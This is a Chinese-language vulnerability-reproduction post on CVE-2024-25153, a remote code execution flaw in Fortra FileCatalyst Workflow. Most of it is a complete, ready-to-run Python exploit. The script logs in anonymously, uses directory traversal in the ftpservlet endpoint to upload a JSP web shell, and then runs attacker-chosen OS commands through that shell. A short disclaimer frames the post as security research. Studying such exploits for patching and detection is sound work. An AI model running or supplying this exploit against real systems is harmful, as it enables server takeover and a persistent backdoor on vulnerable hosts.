漏洞描述
FileCatalystWorkflow版本5.1.6 Build 114之前在/workflow/servlet/ftpservlet中存在不安全的文件上传和目录遍历漏洞,可通过特制POST请求将恶意文件上传到限定的uploadtemp目录之外的位置,从而导致远程代码执行。
资产测绘
FOFA:
漏洞复现
https://github.com/nettitude/CVE-2024-25153/blob/master/CVE-2024-25153.py
#!/usr/bin/python3 """ Exploit for CVE-2024-25153: Remote Code Execution in Fortra FileCatalyst Workflow 5.x, before 5.1.6 Build 114 Full details can be found at https://labs.nettitude.com/blog/cve-2024-25153-remote-code-execution-in-fortra-filecatalyst Usage: CVE-2024-25153.py --host {hostname} --port {port} --url {url} --cmd {command} """ import requests import argparse import re import uuid import urllib.parse def exploit(host, port, url, cmd, secret): s = requests.Session() try: session_response = s.get(f"{host}:{port}/{url}") # Find session token session_pattern = "\/workflow\/jsp\/logon.jsp;jsessionid=[A-Za-z0-9]+" if(re.search(session_pattern,session_response.text) is None): print("[-] => Error getting session token. Check the -u parameter is correct.") return # Redirect to main login redirect = re.findall(session_pattern, session_response.text)[0] redirect_response = s.get(f"{host}:{port}{redirect}") # Perform anonymous login login_pattern = "\/workflow\/logonAnonymous.do\?FCWEB.FORM.TOKEN=[A-Za-z0-9]+" if(re.search(login_pattern,redirect_response.text) is None): print("[-] => Error logging in. Check anonymous login is enabled.") return login = re.findall(login_pattern, redirect_response.text)[0] login_response = s.get(f"{host}:{port}{login}") # Upload our shell exploit_url = f"{host}:{port}/{url}/servlet/ftpservlet?wf=octetStream&h=example.com&u=%58%58&p=%58%58&prt=21&c=PUT&sid=CVE-2024-25153/../../CVE-2024-25153/"; # WARNING: Take great care if modifying the upload path (sid parameter). Attempting to upload in the top-level web root will delete the entire application. exploit_headers = {"User-Agent": "CVE-2024-25153", "Content-Type": "application/octet-stream", "X-File-Name": secret + ".jsp"} exploit_data = """<%@ page import=\"java.util.*,java.io.*\"%> <% if (request.getParameter(\"cmd\") != null) { Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>""" exploit_response = s.post(exploit_url, headers=exploit_headers, data=exploit_data) if("success" not in exploit_response.text): print("[-] => Error uploading file. Target may not be vulnerable.") return # Call the shell cmd_safe = urllib.parse.quote(cmd) cmd_response = s.get(f"{host}:{port}/{url}/CVE-2024-25153/{secret}.jsp?cmd={cmd_safe}") print(cmd_response.text.strip()) except requests.exceptions.RequestException as e: print(f"[-] => Error occurred for {url}. Target may not be vulnerable.") if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-t","--host", type=str, help="target hostname or IP address (include http:// or https://)", required=True) parser.add_argument("-p","--port", type=int, default=8080, help="target port (Default: 8080)") parser.add_argument("-u","--url", type=str, default="workflow", help="URL where FileCatalyst Workflow is installed (Default: workflow)") parser.add_argument("-c","--cmd", type=str, default="id", help="OS command to run (Default: id)") args = parser.parse_args() exploit(args.host, args.port, args.url, args.cmd, str(uuid.uuid4()))
原文始发于微信公众号(漏洞文库):【漏洞复现】Fortra FileCatalyst Workflow远程代码执行漏漏洞(CVE-2024-25153)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论